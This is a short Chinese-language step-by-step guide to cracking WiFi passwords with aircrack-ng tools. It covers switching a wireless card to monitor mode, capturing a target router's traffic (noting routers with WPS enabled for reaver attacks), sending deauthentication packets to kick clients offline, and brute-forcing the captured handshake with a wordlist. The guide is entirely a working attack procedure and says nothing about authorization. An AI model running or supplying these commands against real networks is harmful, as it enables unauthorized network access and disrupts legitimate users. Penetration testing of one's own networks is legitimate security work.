【开模式】 1,airmon-ng start wlan0 为了监听无线网络,将无线网卡转换为混杂模式,并将网卡名改为wlan0mon(wlan monitor)。 【监听】 2,airodump-ng --channel 通道号 --bssid 路由器bssid -w 保存监听所在的位置 --wps wlan0mon 开始监听指定的网络并等待抓包,如去掉channel和bssid就扫描所有可见网络。-w如不设置即不保存抓取的数据包,--wps为列出已开启wps的路由,为方便进行reaver攻击。 【攻击】 3,新开终端窗口 aireplay-ng -0 攻击次数 -a 路由bssid -c 客户端bssid wlan0mon 强制让客户端掉线重连 【破解密码】 4,aircrack-ng -w 字典地址 数据包地址 用指定字典进行数据包暴力枚举解密。